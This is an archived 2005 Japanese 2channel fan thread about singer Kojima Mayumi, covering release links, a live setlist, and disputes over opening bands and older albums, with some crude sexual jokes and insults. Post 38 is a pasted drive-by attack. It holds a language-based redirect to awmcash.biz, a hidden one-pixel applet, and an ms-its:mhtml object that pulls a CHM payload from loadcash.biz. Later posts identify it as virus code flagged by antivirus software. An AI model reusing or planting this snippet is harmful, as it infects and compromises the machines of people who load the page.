5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★愛しの小島麻由美 - Part11.1★

1 :名無しのエリー:2005/05/08(日) 04:49:42 ID:9bDiZFk9
コジマユが音楽担当の「夜の舌先」を含む
オムニバス映画「female」は2005年5月14日公開!

「夜の舌先」のエンディング曲でもある
新曲「やわらかい毛布」を収録した
female オリジナル・サウンドトラックは
2005年5月11日にDefstar Recordsより発売!

渋谷CLUB QUATTROでは5月21日を皮切りに月1の対バンライブ5連発予定!
待望のニューアルバムは来年頭!

前スレ ★愛しの小島麻由美 - Part11★
http://music4.2ch.net/test/read.cgi/musicj/1110155527/

公式サイト・試聴サイト・関連スレ・過去ログ等は>>2-10あたり

2 :名無しのエリー:2005/05/08(日) 04:50:16 ID:9bDiZFk9
公式サイト
http://www.kojimamayumi.com/
http://www.ponycanyon.co.jp/arts/kojima/index.html
アルバム「愛のポルターガイスト」全曲試聴サイト
http://www.ponycanyon.co.jp/kojima/5th_al_bk/
ミニアルバム「面影」
http://www.ponycanyon.co.jp/wtne/cdj/pcca01966.html
アルバム「パブロの恋人」
http://www.ponycanyon.co.jp/wtne/cdj/pcca02076.html
ビデオクリップ集「セシル座のブルース」
http://www.ponycanyon.co.jp/wtne/dvd/pcbp50748.html
ライブDVD「GALACTiKA 07」
http://www.pand.jp/lineup/dgm-1007.html
ライブ映像(8曲)
http://www.fujiint.co.jp/FACTORY/CS0105/0004.html
スタジオライブ映像(2曲)
http://www.j-wave.co.jp/original/viva_access/livelivelive/2003/0312.html

3 :名無しのエリー:2005/05/08(日) 04:51:12 ID:9bDiZFk9
シングル試聴サイト
『結婚相談所』http://www.can-d.com/music/kojima/DAX1-00743.html
『恋の極楽特急』http://www.can-d.com/music/kojima/DAX1-00794.html
『セシルカットブルース』http://www.can-d.com/music/kojima/DAX1-01062.html
『真夜中のパーティー』http://www.ponycanyon.co.jp/wtne/cdj/1202koji.html
『ふうせん』http://www.ponycanyon.co.jp/wtne/cdj/0303koji.html
『ろくでなし』http://www.ponycanyon.co.jp/wtne/cdj/0901koji.html
『わいわいわい』http://www.ponycanyon.co.jp/wtne/cdj/010418koji.html
『甘い恋』http://www.ponycanyon.co.jp/wtne/cdj/010801koji.html
『ロック ステディ ガール』http://www.ponycanyon.co.jp/wtne/cdj/pcca01673.html
『愛しのキッズ』http://www.ponycanyon.co.jp/wtne/cdj/pcca01762.html
『ブルーメロディ』http://www.ponycanyon.co.jp/wtne/cdj/pcca02066.html

関連スレ
浜ヲタよ小島麻由美もきいてくれ
http://tv6.2ch.net/test/read.cgi/ami/1089817021/
【天才】     小島麻由美     【天然】
http://money3.2ch.net/test/read.cgi/employee/1101049332/

4 :名無しのエリー:2005/05/08(日) 04:51:48 ID:9bDiZFk9
過去ログ(邦楽板)
小島真由美がスキだ
http://mimizun.com:81/2chlog/musicj/mentai.2ch.net/musicj/kako/962/962474698.html
小島麻由美
http://mimizun.com:81/2chlog/musicj/mentai.2ch.net/musicj/kako/964/964855818.html
小島麻由美ってどうなるの?
http://mimizun.com:81/2chlog/musicj/piza.2ch.net/musicj/kako/965/965453238.html
小島真由美ってどうよ?
http://mimizun.com:81/2chlog/musicj/piza.2ch.net/musicj/kako/965/965705202.html
奇才・小島麻由美
http://mimizun.com:81/2chlog/musicj/piza.2ch.net/musicj/kako/968/968965281.html
わいわいわい・小島麻由美・わいわいわい
http://mimizun.com:81/2chlog/musicj/piza.2ch.net/musicj/kako/989/989329794.html
#####<<小島麻由美>>#####
http://curry.2ch.net/musicj/kako/991/991848563.html
小島麻由美って聴くべき?
http://curry.2ch.net/musicj/kako/992/992192350.html
@@@@@@@小島麻由美@@@@@@@
http://curry.2ch.net/musicj/kako/998/998423425.html
★皆殺しのブルースが聴こえる…小島麻由美スレ★
http://music.2ch.net/musicj/kako/1001/10019/1001947722.html
★極楽特急に乗り込んで…小島麻由美スレReturns★
http://music.2ch.net/musicj/kako/1008/10080/1008068251.html

5 :名無しのエリー:2005/05/08(日) 04:52:44 ID:9bDiZFk9
過去ログ(邦楽板)
【ぶっちゃけた話】小島麻由美は凄かった! (実質Part1)
http://music.2ch.net/musicj/kako/1010/10109/1010935325.html
★愛しの小島麻由美 - Part2★
http://tv3.2ch.net/musicj/kako/1027/10277/1027718816.html
Part3 http://tv3.2ch.net/musicj/kako/1039/10391/1039199807.html
Part4 http://music2.2ch.net/test/read.cgi/musicj/1044239592/
Part5 http://music2.2ch.net/test/read.cgi/musicj/1050629843/
Part6 http://music2.2ch.net/test/read.cgi/musicj/1061518310/
Part7 http://music2.2ch.net/test/read.cgi/musicj/1070089253/
Part8 http://ex5.2ch.net/test/read.cgi/musicj/1079731798/
Part9 http://ex5.2ch.net/test/read.cgi/musicj/1093478486/
Part10 http://music4.2ch.net/test/read.cgi/musicj/1099271307/

過去ログ(芸能・音楽・スポーツ ニュース速報+)
【音楽】CCCDと言われた小島麻由美のニューアルバムが通常CD仕様に[12/02]
http://news2.2ch.net/mnewsplus/kako/1038/10388/1038844088.html
【芸能】小島麻由美、3月19日に初のPV集を発売【セシル座のブルース】
http://news2.2ch.net/mnewsplus/kako/1043/10437/1043765851.html
【音楽】小島麻由美の初ビデオクリップ集『セシル座のブルース』3/19新発売!
http://news2.2ch.net/mnewsplus/kako/1047/10479/1047993663.html

6 :名無しのエリー:2005/05/08(日) 04:53:35 ID:9bDiZFk9
過去ログ(その他)
小島麻由美
http://cheese.2ch.net/music/kako/974/974194620.html
小島麻由美さんは色っぽい
http://cheese.2ch.net/music/kako/985/985050717.html
小島麻由美
http://cheese.2ch.net/music/kako/989/989497587.html
小島麻由実スレ
http://cheese.2ch.net/music/kako/990/990453285.html
小島の麻由美
http://cheese.2ch.net/music/kako/992/992021485.html
小島麻由美のような音楽
http://music.2ch.net/music/kako/1008/10086/1008686163.html
林檎ヲタよ、小島麻由美も聴いてくれ
http://tv.2ch.net/apple/kako/983/983122948.html
◇◆小島麻由美◆◇
http://piza2.2ch.net/utu/kako/999/999980654.html
♪小島麻由美・エゴラッピンみたいな壊メロ♪
http://music.2ch.net/natsumeloj/kako/1010/10103/1010393196.html
小島真由美ってどうよ?
http://music.2ch.net/classic/kako/1025/10255/1025515406.html
【コジマユ】小島麻由美【コジマユ】
http://music.2ch.net/minor/kako/1027/10277/1027700711.html
エゴラッピンや小島真由美みたいなコード進行
http://music.2ch.net/compose/kako/1014/10142/1014201843.html
林檎ヲタよ、小島麻由美も聴いてくれ2
http://tv6.2ch.net/test/read.cgi/apple/1027878330/

7 :名無しのエリー:2005/05/08(日) 04:54:58 ID:9bDiZFk9
5月21日(土)18:00開場 19:00開演 渋谷・クラブクアトロ
コジマ・ロックンロールキャラバン Vol.1
出演:小島麻由美(with 塚本功、ASA-CHANG、Kyon)
対バン:スパルタローカルズ

6月24日(金)18:00開場 19:00開演 渋谷・クラブクアトロ
コジマ・ロックンロールキャラバン Vol.2
出演:小島麻由美(with 塚本功、ASA-CHANG、Kyon)
対バン:イースタンユース

7月17日(日)コジマ・ロックンロールキャラバン Vol.3
8月26日(金)コジマ・ロックンロールキャラバン Vol.4
9月23日(金・祝)コジマ・ロックンロールキャラバン Vol.5

8 :名無しのエリー:2005/05/08(日) 04:56:08 ID:9bDiZFk9
カラオケするならHyperJoy! 32曲配信中!
http://joysound.com/
ファンサイトなら小島麻由美ファン倶楽部!
http://www.geocities.jp/kojimayufan/
歌詞検索ならうたまっぷ!
http://www.utamap.com/index.html
オムニバス映画「female」公式サイト
http://www.female-movie.com/
female オリジナル・サウンドトラック視聴サイト
http://www.sonymusic.co.jp/Music/Info/Sowelu/release/soundtrack/index.html

9 :名無しのエリー:2005/05/08(日) 04:57:57 ID:9bDiZFk9
★愛しの小島麻由美 - Part11★はdat落ちした模様。

10 :名無しのエリー:2005/05/08(日) 05:13:45 ID:9bDiZFk9
フリーペーパー「FLYER」の連載企画
「小島麻由美の野良猫ロックンロールキャラバン」
http://www.net-flyer.com/
トップページの「FLYER」をクリック、「COLUMN」の小島麻由美ページ

全国19店舗のパルコと、渋谷・名古屋・心斎橋・広島のクラブクアトロ
その近郊地域のいろいろなお店で入手可能。発行は毎月25日。

11 :名無しのエリー:2005/05/08(日) 09:20:43 ID:P8B2t1Oo
もう落ちたのか・・
やっぱローカル歌手に成り下がったから・

12 :名無しのエリー:2005/05/08(日) 09:27:39 ID:/8kogsM7
dat落ちは久しぶりだな

13 :名無しのエリー:2005/05/08(日) 09:33:41 ID:P8B2t1Oo
東京でライブがあっても
キモい客の話にしかならないから嫌い


14 :名無しのエリー:2005/05/08(日) 15:29:06 ID:hjrFQLHj
落ちたのは新しい板ができたからでしょう。
新スレは邦楽女性ソロ板に立てたほうが良かったんじゃないの?

15 :名無しのエリー:2005/05/08(日) 20:29:53 ID:P8B2t1Oo


音楽志向がマイナー系だったり2chで認知度が低い場合は
  インディーズ&マイナーミュージシャン(I&M)板

非ヒットチャート系ポップス、歌謡曲、演歌は懐メロ邦楽板

16 :名無しのエリー:2005/05/09(月) 00:50:26 ID:lz3e9E4h
それにしてもボチボチイベントやってるのに全く盛り上がらない。。
落ち目か

17 :名無しのエリー:2005/05/09(月) 01:30:06 ID:QH/nhgcm
ある程度が上がっていた時期がない人間には落ち目という言葉は不適切だとおもうよ

18 :名無しのエリー:2005/05/09(月) 02:35:45 ID:jjHLE1T3
おまえらジュンイチがいないとすれさえも保持できないんだな

19 :名無しのエリー:2005/05/09(月) 03:39:38 ID:lraKp+u3
新板ができてます。
邦楽板で続けてもいつかは強制移転になるので
↓の板に立て直したほうがいいとおもいます。

邦楽(ソロ女)(仮)
http://music4.2ch.net/musicjf/

20 :名無しのエリー:2005/05/09(月) 08:33:21 ID:lz3e9E4h
強制移転してもらえるならそれでいいんじゃないの?
乱立の方が鬱陶しい

21 :名無しのエリー:2005/05/10(火) 02:07:49 ID:Zv+wvxGD
>>19
別に急ぐ必要はないと思うよ。

22 :名無しのエリー:2005/05/10(火) 08:48:10 ID:xO6sTdSq
>>17
「ある程度」の程度の定義なんてどーだっていい。
以前より落ちたことは間違いない

23 :名無しのエリー:2005/05/10(火) 23:01:48 ID:xO6sTdSq
新たにファンになりそうな人の書き込みに対して
必ずキモいレス付けて引かすし

24 :ちろ:2005/05/10(火) 23:16:43 ID:V8Tnp1Ic
こないだ急にスレ無くなったのでビビりました。 datおちって何ですか?

こないだ会社のラジオで小島さんの「真夏の海」(だったっけ?すんません、うろ覚え。)が流れて話してました。
小島さんの歌は、おばさんとかに共感されるみたいですね。共通点が無いですが。
でも、歌い方がやはり昭和だそうで、若い子には馴れないみたいです。


25 :名無しのエリー:2005/05/10(火) 23:50:45 ID:ztIikbGt
そうかなー
俺は18歳のときに衝撃受けたよ。
まだ、若者だったけど、あんまりない感じだったから。
9年位前です。

26 :名無しのエリー:2005/05/11(水) 12:31:32 ID:2Nvi34t9
新曲「やわらかい毛布」が収録されてるサントラ盤が今日発売ですよ、みなさん。

27 :名無しのエリー:2005/05/11(水) 16:20:13 ID:6GLir7l8
「やーらかいチンチン」

28 :名無しのエリー:2005/05/12(木) 00:30:47 ID:sxqQMOmg
ヒトカラでもなんでもいいから、ちょっと歌う練習してみ

29 :名無しのエリー:2005/05/12(木) 00:58:24 ID:VQiBAbb2
http://homepage3.nifty.com/TORU-FK/piano.swf

30 :名無しのエリー:2005/05/12(木) 08:58:18 ID:DEuukRFb
関連スレ
【芸能】長谷川京子、エロス演じ“楽しい” 映画「female」試写会で舞台あいさつ[05/11]
http://news18.2ch.net/test/read.cgi/mnewsplus/1115737570/

31 :お知らせ:2005/05/12(木) 23:53:38 ID:nZjfgtKw
このスレ移転します〜
邦楽(ソロ女)(仮)
http://music4.2ch.net/musicjf/
に移動で中身そのままアドレスだけ変わります。もし問題ある場合は
http://music4.2ch.net/test/read.cgi/musicj/1099655636/
までお願いします。

32 :名無しのエリー:2005/05/13(金) 02:28:16 ID:syPZBQ4E
こんな事に尽力して手間や時間を使ってるとか
奇特な方も居られるものですね

33 :名無しのエリー:2005/05/14(土) 00:02:20 ID:HjpFRwxf
板へじゃなくスレへ誘導してくれよな・・・

34 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:04:54 ID:AY47/kSX
>>33
移転するまではURLわからんと思うよ。

35 :名無しさん@お腹いっぱい。:2005/05/14(土) 01:01:37 ID:Tvp5Vzl9
>>34
旧スレmusic4.2ch.net/test/read.cgi/musicj/1115495382/
現スレmusic4.2ch.net/test/read.cgi/musicjf/1115495382/

36 :名無しさん@お腹いっぱい。:2005/05/15(日) 18:28:34 ID:n46NEzx8
土曜日ライヴやんけ

37 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:35:27 ID:yJoHrXr2
ちょっと見ない間に移転していたのか…

38 :名無しのエリー:2005/05/18(水) 01:11:52 ID:nX079FLK
<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

39 :名無しさん@お腹いっぱい。:2005/05/18(水) 21:14:03 ID:ZSXswZim
やわらかい毛布聞いた人いる?

40 :名無しさん@お腹いっぱい。:2005/05/19(木) 04:07:43 ID:rcsuXDlf
やーらかいチンチン

41 :名無しの歌姫:2005/05/20(金) 23:06:11 ID:Vx3N/ukC
保守

42 :名無しの歌姫:2005/05/21(土) 22:29:02 ID:2CWTp9td
ライブ行って来た

演奏はスパルタローカルズ→小島麻由美の順番

セットリスト(スパルタローカルズは省略)

あの娘はあぶないよ
蜜蜂
刺青
月の光
黒い革のブルース
パレード
砂漠の向こう
光と影
ポルターガイスト
ひまわり
蛇むすめ
さよならカエル
バナナの気持ち(新曲、弾き語り)

メンバー
小島麻由美、塚本功、ASA-CHANG、Kyon

その他
塚本さんが本日誕生日
ASA-CHANGが12キロやせた
結婚相談所のサルのイラストTシャツが売ってた
蛇むすめの後奏で小島嬢がニコニコしながらシンバルを叩いていた
さよならカエルの後で小島嬢に手紙を渡したやつがいた(ズンイチ?)

43 :名無しのエリー:2005/05/21(土) 22:53:54 ID:vhffwiuE

         .┌┐
        / /
      ./ / i
      | ( ゚Д゚) <そんなバナナ!
      |(ノi  |)
      |  i  i
      \_ヽ_,ゝ
        U" U

44 :名無しの歌姫:2005/05/21(土) 23:03:10 ID:Y38RFvV7
>42
あの手紙?
何書いたんだ
でかすぎw

45 :名無しの歌姫:2005/05/22(日) 00:33:51 ID:CvdSjmK5
>>42
GJ!('◇')ゞ

46 :名無しの歌姫:2005/05/22(日) 01:00:30 ID:rbEx29nw
>>

47 :名無しの歌姫:2005/05/22(日) 01:12:50 ID:tRI75hRZ
>42
スタッフも驚いてた。なんだったんだろ。


対バンといっても、お互い絡んだりはしないのね。
スパルタローカルズが終わったら淡々と片付けて、
こじまゆバンドに移行。
スパルタ〜のファンとのノリの違いがありありと。
温度差を感じますた。



48 :名無しの歌姫:2005/05/22(日) 02:25:52 ID:+l5QR5lA
>>42
>バナナの気持ち(新曲、弾き語り)

おんにゃのこの気持ちはてなわからいのーへんなの!


49 :名無しの歌姫:2005/05/22(日) 03:06:09 ID:Co97/fc6
スパルタローカルズのファンの人のなかには
出番が終わったら帰ってしまった人もいるみたいですね。

小島さんに手紙を渡していた人物は
たぶんズンイチではないと思います。
ズンイチと思われる人物はライブが終わったあと
手紙を渡した人の事を
鬼の形相で睨んでいましたw

50 :名無しの歌姫:2005/05/22(日) 08:17:10 ID:rbEx29nw
>>11
エスカレートする可能性があるな・・・

51 :名無しの歌姫:2005/05/22(日) 08:26:29 ID:/OAVBewA
>>49
私、スパルタファンで小島麻由美も好きですが、
前で汗をかいて一回ロッカーに戻りましたが、
着替えたりしてる人はパラパラいたけど
帰ってる人って見ませんでしたよ。いても一桁くらいかと。

52 :名無しの歌姫:2005/05/22(日) 08:33:26 ID:N13OB5r0
スパルタローカルズをこじまゆのライブと一緒にやらせるのは
どうかと思う。
こじまゆの歌をマッタリ聴きにいったのに、その前に爆音鳴らされて
耳鳴りが未だに治らない。聞きたくない曲を1時間もガンガン
聞かされるのは本当に苦痛・・・
こじまゆと同じようなジャンルの人に歌って欲しかった・・・

53 :名無しの歌姫:2005/05/22(日) 09:18:53 ID:Faw0Vocq
確かにスパルタだけ見て帰る人は本当に少なかったね。
好きじゃないなら仕方ないけど彼女本人が希望した対バン相手なんだし自分は何か通じるところがあるのではと思いながら聞いてた。
スパルタファンの話では普段ライブでやらない曲なんかも小島マユミを意識して久々にひっぱりだしてやってくれたみたい。
なんかそうゆうのって良いな。

54 :名無しの歌姫:2005/05/22(日) 11:11:20 ID:agV8LmOe
>>53
コジマユが対バンの選択に絡んでるとは思えない。
レコ社かどっかのイベンターの選択でないの?

55 :名無しの歌姫:2005/05/22(日) 11:54:33 ID:4gziJu2q
対バンの選択に絡んではいないでしょう。こじまゆ主体で対バンやるなら、ロックバンドじゃないだろうし、
企画自体に無理がある。こじまゆが一押しの若手ミュージシャン(岩見十夢とか)
もいるし、塚本さんがバックをつけている人とか…。個人的には、昭和歌謡っぽいテイストの女性シンガーの
企画のほうが良かった。奥村愛子とか…。

ズンイチ昨日やっぱり来ていたか。めずらしく、大人しかったな。

56 :名無しの歌姫:2005/05/22(日) 13:07:20 ID:+9uUcOBg
スパルタローカルズが最後に歌ったタイトル教えて。

57 :名無しの歌姫:2005/05/22(日) 13:08:38 ID:agV8LmOe
>>56
こんなにもグラマー

58 :名無しの歌姫:2005/05/22(日) 13:28:18 ID:Kolk228f
7月の対バンは菊池成孔さんだから、小島さんの希望が入っているのかな?

59 :名無しの歌姫:2005/05/22(日) 13:31:02 ID:+9uUcOBg
>57
公式のディスコグラフィーに見当たらないんですけど・・・( ´Д`;)

60 :名無しの歌姫:2005/05/22(日) 14:19:03 ID:Tp8C0v3+
>>56
ウララ


61 :名無しの歌姫:2005/05/22(日) 16:44:03 ID:+9uUcOBg
>60
ありがとう。聞いてみるよ。
自分合いの手が入る曲が好きみたい。

62 :名無しの歌姫:2005/05/22(日) 20:01:03 ID:/OAVBewA
えーと、スパルタのセカンドかサードアルバムが出た時に、
アルバムのフライヤーに小島麻由美のコメントが載ってたけど。

63 :名無しの歌姫:2005/05/22(日) 21:05:37 ID:rbEx29nw
そういえば、横山剣が小島麻由美ベタ褒めだって書き込みがあったけど横山剣あちこちのアーティストにベタ褒めコメント書いてるよ。
しかも似たり寄ったりのことを書いてる。
完全にヤラセだね!残念!

64 :名無しの歌姫:2005/05/22(日) 21:08:13 ID:XS71Zqty
スパルタは小島さん直々の指名だったらしいよ。

65 :名無しの歌姫:2005/05/22(日) 23:00:59 ID:/uoxx4Kb
>58
まじ??
公式にでてなくね??

66 :58:2005/05/22(日) 23:37:06 ID:Kolk228f
>>65
会場でもらったチラシに書いてあったよ。
「菊地成孔クインテット・ライブ・ダブ」ってね。
楽しみ。

67 :名無しの歌姫:2005/05/23(月) 00:29:40 ID:XhshwQ/e
>>63
リキッドの「こじまゆ+CKB+スカパラ」行かなかったの?
あの頃からべた褒めだったけど

68 :名無しの歌姫:2005/05/23(月) 00:31:57 ID:kFYLStYH
>>67
だから誰にでもやってることなんだとかいとるんだ。w (ベタ褒め



69 :名無しの歌姫:2005/05/23(月) 00:34:19 ID:iFB7fdkX
>>68
そうだね、誰に対しても「いいねー!」しか言わないかも。

70 :名無しの歌姫:2005/05/23(月) 00:40:18 ID:yW5Fu7zg
でも「情熱大陸」で横山剣を特集してたとき横山の自宅に愛のポルターガイストのLP版が置いてあった。

71 :名無しの歌姫:2005/05/23(月) 00:43:35 ID:kFYLStYH
横山剣ってどこがすごいんだかさっぱり分からないんだけどね。
あちこちで「イイネ!イイネ!」って書いてるぞ

72 :名無しの歌姫:2005/05/23(月) 02:58:17 ID:bg0zaZ5N
剣さんも好きだけど、あの人のリップサービスはやりすぎ。
わざとらしさやあざとさを感じてしまう。

初めてコジマユと対バンやった時(新宿ロフト)は
CDだかLPを1枚貰ったけどまだ聴いてないと言って、コメントのしようがないから
ひたすらコジマユの容姿を褒めちぎってごまかしていたよ。

73 :名無しの歌姫:2005/05/23(月) 03:01:49 ID:fHBx4eSN
すいません。
>>38の書き込みって何ですか?

74 :名無しの歌姫:2005/05/23(月) 11:24:36 ID:/HShhjIk
>>73
どこぞのパカがウイルスコードを貼り付けたんだよ
ノートン先生が毎回反応してウザかった
リーマン板のこじまゆスレの方はまだあぼーんされていないな

75 :名無しの歌姫:2005/05/23(月) 12:12:29 ID:jrOdHt4m
>ひたすらコジマユの容姿を褒めちぎってごまかしていたよ。

どこを?w
胸か?

76 :名無しの歌姫:2005/05/23(月) 21:01:00 ID:O9mK7LRh
>>75
歯、やろ?
ってか、容姿やなくて、声とか「間」とかの方が褒めやすいやろ…

77 :名無しの歌姫:2005/05/23(月) 23:23:37 ID:Uw4XngwZ
グラビアアイドルの佐藤寛子とは親戚?

78 :名無しの歌姫:2005/05/23(月) 23:53:16 ID:K8IKRNNv
>>74
スレ違いなんですが、、、
ノートンに「Bloodhound.Exploit.6」とかいうのの検疫が出来ちゃったんですが、
これらは放っておいても大丈夫なんですか?
それとも右クリックで削除できるようですが、削除すべきものなんですか?
PC初心者なもので。。。どうすればいいのでしょう?

79 :名無しの歌姫:2005/05/24(火) 00:54:32 ID:rH9Iv0YB
>こじまゆの歌をマッタリ聴きにいったのに、その前に爆音鳴らされて
>耳鳴りが未だに治らない。聞きたくない曲を1時間もガンガン
>聞かされるのは本当に苦痛・・・

次のイースタンには来るんですか?

80 :名無しの歌姫:2005/05/24(火) 01:28:41 ID:0TRhzPJT
>>52
イースタンはもっと凄いよ
ケガしないように後ろにいてね

81 :52:2005/05/24(火) 21:29:28 ID:bYyoQO0Z
ピアノの弾き語りの人と組めばいいのに・・・
次の日の朝まで耳鳴りしてた。
真夏の海が好きなのですが、古い曲はあまり歌わないのですか?

82 :名無しの歌姫:2005/05/24(火) 21:41:54 ID:rH9Iv0YB
>>52
シークレットで出てきたわけでもないのに、
対バンありのライブに来ておいて
聞きたくない曲を一時間聞かされるのが苦痛、
なんて言ってる厨、久々に見た。

83 :名無しの歌姫:2005/05/24(火) 21:56:10 ID:MxZG5t08
つーか全然爆音系じゃ無かったし。

同じ様なジャンルの人の方が、比較されちゃってキツいと思うけど。

84 :名無しの歌姫:2005/05/25(水) 02:02:58 ID:ag8qz6Zy
>>82
事前情報があったってはじめて聴くような対バンの曲をわざわざ
探してまでもライブ前に聴いておくこともないんでその場ではじめて
聴くことになって気に入らない曲だったらやっぱり苦痛だろ?

聞きたくない曲を約1時間楽しく聞く方法を教えて下され。

85 :名無しの歌姫:2005/05/25(水) 02:10:08 ID:T6Ejc8jg
最近は小島麻由美本人の気晴らし程度のためのイベントが大杉。
重荷に感じないでいい、負担の軽くて手軽なものを見繕っている。

客のことは考えてない。

86 :名無し:2005/05/25(水) 02:23:54 ID:TXiguIz2
超〜きらーい

87 :名無しの歌姫:2005/05/25(水) 20:37:59 ID:6qfwa0hd
客個人の趣味を押し付けられてもなー

どうしても耐え難い苦痛とまで言うのなら、外で待機してれば?

88 :名無しの歌姫:2005/05/25(水) 21:28:56 ID:meBg66J7
うるさければ立ち位置変えればいい。
対バンありのライブなんだから、興味ない出演者のときにまで同じ場所にいなくていいのに。
この手のライブでは、興味あるとき前にいって、そうでないときは他のファンに
譲るものだと思ってた。

音の大きさ関係なしにただ趣味が合わないのはしょうがない。
自分好みのばかり出るとわかってるライブか、ワンマンだけ行くしかないのでは。




89 :名無しの歌姫:2005/05/25(水) 21:37:25 ID:lpMHIlZH
同じ金払うんやったらグダグタ言わずに楽しんだ方がエェやん!
と、関西人の俺は思う。

90 :名無しの歌姫:2005/05/25(水) 23:15:21 ID:T6Ejc8jg
そこで耳栓でつよ

91 :名無しの歌姫:2005/05/26(木) 00:48:22 ID:0bhbOTG+
自分は大のスパルタ好きで小島さんのワンマンも行ったことあるけど
>>88が言いたいことを全部言ってくれているような。
自分も対バンで自分には合わないな〜、って思うバンドがあれば下がるしね。
それでも前の方で小島さんを観たい!って思うなら1時間我慢するべきで
>>52はちょっとワガママ過ぎると思います。2年振りの小島さんは良かったよー。

92 :名無しの歌姫:2005/05/26(木) 03:25:15 ID:TFvBBu76
馬面だしCDも売れないしセシル3部作のような輝きもないし
ライブも対バンだしだがそれがいい。

93 :名無しの歌姫:2005/05/26(木) 08:56:48 ID:OY0s9L0G
でた!セシル3部作とか勝手に命名マンセー野郎!
それならもう聞いてくれるな未練がましい

俺から言わすとセシル3部作とやらの頃は殻に閉じこもってる感じでダメ
曲が似たり寄ったりで、あれで終わってくれて助かった

94 :名無しの歌姫:2005/05/26(木) 12:17:02 ID:txz7Vs50
セシル3部作という言い方は一般的だぞ。
セシル3部作は今のより個性は在る、いい意味悪い意味両方。
俺は好きだが,セシル3部作。

95 :名無しの歌姫:2005/05/26(木) 13:07:37 ID:Suap/YUo
地元の図書館にはme and my monkey on the moonから
パブロの恋人まで4枚のアルバムが置いてある。
本や雑誌と違ってAVはこちらからリクエストが出来なくて、
図書館の人が(司書かな?)選んで購入するシステムになっているらしい。
こじまゆ好きの司書がいるのかな。

96 :名無し:2005/05/26(木) 21:27:41 ID:Y3ZBqK4m
徳永憲と はめてろ ばーか

97 :名無しの歌姫:2005/05/26(木) 21:51:16 ID:9ES9kD/5
俺はセシル時代のが好き。
詩が好き。
菊池氏と組んでアルバム一枚作って欲しい。

98 :名無しの歌姫:2005/05/26(木) 22:45:09 ID:OY0s9L0G
一般的なわけねーだろボケ

99 :名無しの歌姫:2005/05/26(木) 23:05:53 ID:r4+kHco6
>>98
必死だなw
俺もセシル3部作好きやぞ。
極楽特急は名曲。
最近のも好きやけど、せやからってセシル3部作が嫌いでもない。

100 :名無しの歌姫:2005/05/26(木) 23:10:22 ID:OY0s9L0G
97
言ってることが矛盾してるぞ
菊池と組んで、昔のなよなよした作品が出来るわけ無いだろ。
とりあえずオマエは聞く耳無いで話する以前だから下がってよし!

101 :名無しの歌姫:2005/05/26(木) 23:14:05 ID:OY0s9L0G
昔の方が好きだったくせに、なんであれから長い年月過ぎてるのにまだネチっこく追ってるんだよ。
そのキモさが許せんでムカムカする

102 :名無し:2005/05/26(木) 23:17:23 ID:Y3ZBqK4m
徳永憲とセックスフレンドって ほんま?

103 :名無しの歌姫:2005/05/26(木) 23:49:09 ID:mUk5FgiW
さよならセシルはアレンジが神懸り的。

104 :名無しの歌姫:2005/05/26(木) 23:53:27 ID:r4+kHco6
善くも悪くもな。

105 :名無しの歌姫:2005/05/27(金) 00:18:59 ID:XInhNEcP
「昔は良かった・・・」

キモス

106 :名無しの歌姫:2005/05/27(金) 01:54:50 ID:pUguvwgp
ロイヤルペンタゴンなんとかガーデンとやったライブは最高だった。
あれマジでCDに入れて欲しい。

107 :無名し:2005/05/27(金) 02:54:49 ID:3DguZahB
長谷川都ってさ ライブ前だとテンションあがるよねー
鬱のくせに

108 :名無しの歌姫:2005/05/27(金) 02:56:02 ID:nssjm/Io
>>107
スレ違いw

109 :名無しの歌姫:2005/05/27(金) 04:07:51 ID:djvlmzzs
さよならセシルは曲の配置が絶妙。

110 :prin ◆2Y9Fklqkrw :2005/05/27(金) 06:43:05 ID:8+Bq7Bs9
しかし、『セシルカットのブルース』が未だに意味不明。


111 :名無しの歌姫:2005/05/27(金) 07:42:08 ID:RL0Klcem
>>110
俺もこのマターリスレで昔おまえが叩かれまくったことが意味不明。

112 :名無しの歌姫:2005/05/27(金) 08:58:54 ID:XInhNEcP
『セシルカットのブルース』 はぁ??

おれはいみわかるきがする

113 :名無しの歌姫:2005/05/27(金) 13:56:46 ID:DZhkpJVG
気のせい。

114 :名無しの歌姫:2005/05/27(金) 22:52:23 ID:Ob/kXVVE
「の」

115 :名無しの歌姫:2005/05/27(金) 23:05:08 ID:n9QjMsje
徳永憲になりたい!

116 :名無しの歌姫:2005/05/27(金) 23:09:31 ID:DZhkpJVG
>>115
今日からお前はこのスレにおいて徳永憲だ!

117 :名無しの歌姫:2005/05/27(金) 23:42:24 ID:XInhNEcP
http://www16.ocn.ne.jp/~toku_ken/image/comment_kojima.jpg

徳永くんの何が世界級なのかと

118 :名無しの歌姫:2005/05/27(金) 23:46:19 ID:DZhkpJVG
>>117
アレだろ。

119 :無名し:2005/05/27(金) 23:52:02 ID:3DguZahB
あはは チンポか?
しかし アレだぞ?
徳永憲は ガリガリだぞ?
奥さんもいて真由美もプレイできるのかよ?

120 :名無しの歌姫:2005/05/28(土) 01:43:19 ID:Ofx2ptfS
しかし、『セシルカットのブルース』が未だに意味不明。

って文章が何より意味不明だからな。 市んでこい

121 :prin ◆2Y9Fklqkrw :2005/05/28(土) 06:01:04 ID:Rdlo9r6o
>>120
お前バカだろw
バカに用はねぇ。ウセロ。

122 :名無しの歌姫:2005/05/28(土) 08:51:52 ID:Ofx2ptfS
>>111
これで分かった?

123 :名無しの歌姫:2005/05/28(土) 09:20:54 ID:mBbqHzb+
『パイプカットでブルーっす』

124 :名無しの歌姫:2005/05/28(土) 09:36:55 ID:iLkrAK8n
>>123
雄牛のパイプカットの感触は忘れられないらしい。

125 :prin ◆2Y9Fklqkrw :2005/05/28(土) 18:27:02 ID:Rdlo9r6o
>>122
きちんと周波数を合わせろよ。電波同士で話がかみ合ってねーぞw

>>117
小島麻由美好みの痩せ型色男タイプだな。おまえらとは別生物みたいだ。

